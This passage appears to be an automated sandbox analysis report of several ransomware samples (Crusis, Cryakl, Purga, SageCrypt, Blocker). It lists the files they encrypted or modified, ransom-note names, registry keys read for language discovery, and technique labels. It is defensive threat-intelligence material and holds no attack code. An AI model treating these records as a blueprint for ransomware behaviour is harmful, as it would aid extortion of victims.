Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files\Java\jre7\lib\zi\America\Metlakatla.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Internet Explorer\en-US\jsdbgui.dll.mui Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\net.dll.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01292_.GIF.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Apex.eftx.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files\VideoLAN\VLC\Restore-My-Files.txt Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar.id-DA208E5B.[[email protected]].gamma Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\PLA\Reports\it-IT\Report.System.Network.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-e..gadgetxml.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_bf201eb0e6f23766\gadget.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-h..homegroup.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_82c1d681ff5e2d6f\OOBE_HELP_What_is_HomeGroup.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_74e67e2b6547c670\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_jobs.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..essionale.resources_31bf3856ad364e35_6.1.7600.16385_it-it_d674847994cc2c9e\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_6.1.7600.16385_it-it_9e5b45457e71d50c\Rules.System.Common.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_c02a16e1ae17ab94\about_remote_troubleshooting.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_preference_variables.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\1042\LocalizedData.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-n..sh-helper.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_e6af38e8f918bc99\Report.System.NetTrace.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\Microsoft.PowerShell.Commands.Diagnostics.dll-Help.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-h..statement.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_30da4a65071b6499\vofflps.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7601.17514_es-es_accd0db07da7e5b6\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..epremiume.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_99ee0ee50c0a9323\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..homebasic.resources_31bf3856ad364e35_6.1.7601.17514_it-it_99a20a91fbb28e1c\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\PLA\Rules\Rules.System.Wireless.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..t-starter.resources_31bf3856ad364e35_6.1.7601.17514_it-it_9aff0a0726ff98b6\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_74b66e05cc4097c8\about_locations.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1d72a0e2bb459532\about_jobs.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_prnhp002.inf_31bf3856ad364e35_6.1.7600.16385_none_2f4e6f72537f8faa\Amd64\HPC5201F.XML Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\PLA\Reports\en-US\Report.System.Configuration.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-shell-wallpaper-nature_31bf3856ad364e35_6.1.7600.16385_none_d5909570704a09c0\img1.jpg Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_6.1.7601.17514_none_2fd7b56967fc5c76\base_rtl.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-font-fms_31bf3856ad364e35_6.1.7601.17514_none_a5f8bb0ccaefbe07\fms_metadata.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1d72a0e2bb459532\about_Path_Syntax.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-tabletpc-inputpanel_31bf3856ad364e35_6.1.7601.17514_none_6fb51b358e21d75f\split.avi Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_netfx-assemblylist_xml_b03f5f7f11d50a3a_6.1.7601.17514_none_e3a109eaec8645a9\FrameworkList.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\servicing\Sessions\31117645_1659442080.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..m-starter.resources_31bf3856ad364e35_6.1.7601.17514_en-us_8f53ccf1a75d5585\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_do.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_6.1.7601.17514_none_2fd7b56967fc5c76\oskpredbase.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\PLA\Rules\es-ES\Rules.System.Summary.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-h..indetails.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_fd1ece67619f6bb2\OOBE_HELP_Opt_in_Details.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_b4334efea73fef8e\Report.System.Disk.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_prnhp002.inf_31bf3856ad364e35_6.1.7600.16385_none_2f4e6f72537f8faa\Amd64\hpmcpap6.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_e89908d79afacf17\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_1da743febb1ea38d\about_join.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-t..textservice-amharic_31bf3856ad364e35_6.1.7600.16385_none_c1a26f7656a140d7\TableTextServiceAmharic.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-g..zlegadget.resources_31bf3856ad364e35_6.1.7600.16385_es-es_0212532a5cdf4b5f\gadget.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-n..sh-helper.resources_31bf3856ad364e35_6.1.7600.16385_en-us_442c6606061fb492\Report.System.NetTrace.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_11b07c1bb446e787\Report.System.Memory.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_Line_Editing.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\PLA\Reports\de-DE\Report.System.Diagnostics.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-ehome-epgtos.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_588756b8b7ec6ba3\epgtos.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_b4334efea73fef8e\Rules.System.Diagnostics.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_trap.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_prnhp003.inf_31bf3856ad364e35_6.1.7600.16385_none_2fd781a76c9dcc13\Amd64\hpl7400t.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\PLA\Reports\en-US\Report.System.Wired.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-g..-currency.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_5c4791cafd126e03\gadget.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_aliases.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_methods.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1d72a0e2bb459532\Microsoft.PowerShell.Commands.Diagnostics.dll-Help.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-t..d-chinese-shuangpin_31bf3856ad364e35_6.1.7600.16385_none_7aab2462f08e2d02\TableTextServiceSimplifiedShuangPin.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-t..nputpersonalization_31bf3856ad364e35_6.1.7600.16385_none_9ba1049ce0053bef\ipscsy.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\Globalization\MCT\MCT-AU\Wallpaper\AU-wp4.jpg Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\PLA\Rules\it-IT\Rules.System.Configuration.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\Web\Wallpaper\Landscapes\img12.jpg Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..-startern.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_534cc7b6b042b425\license.rtf Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1d72a0e2bb459532\about_escape_characters.help.txt Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-wmpnss-service_31bf3856ad364e35_6.1.7601.17514_none_61acd141e5332baf\ContentDirectory.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_prnhp003.inf_31bf3856ad364e35_6.1.7600.16385_none_2fd781a76c9dcc13\Amd64\hpd5060t.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe File opened for modification C:\Windows\winsxs\amd64_prnhp005.inf_31bf3856ad364e35_6.1.7600.16385_none_30e9a6119eda44e5\Amd64\hp6500nt.xml Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 2616 Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 796 3576 WerFault.exe 486 7328 3924 WerFault.exe 501 7372 6092 WerFault.exe 484 2952 4132 WerFault.exe 507 7648 6368 WerFault.exe 519 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows Update.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language arp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language database.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 60 IoCs
Adversaries may check for Internet connectivity on compromised systems.
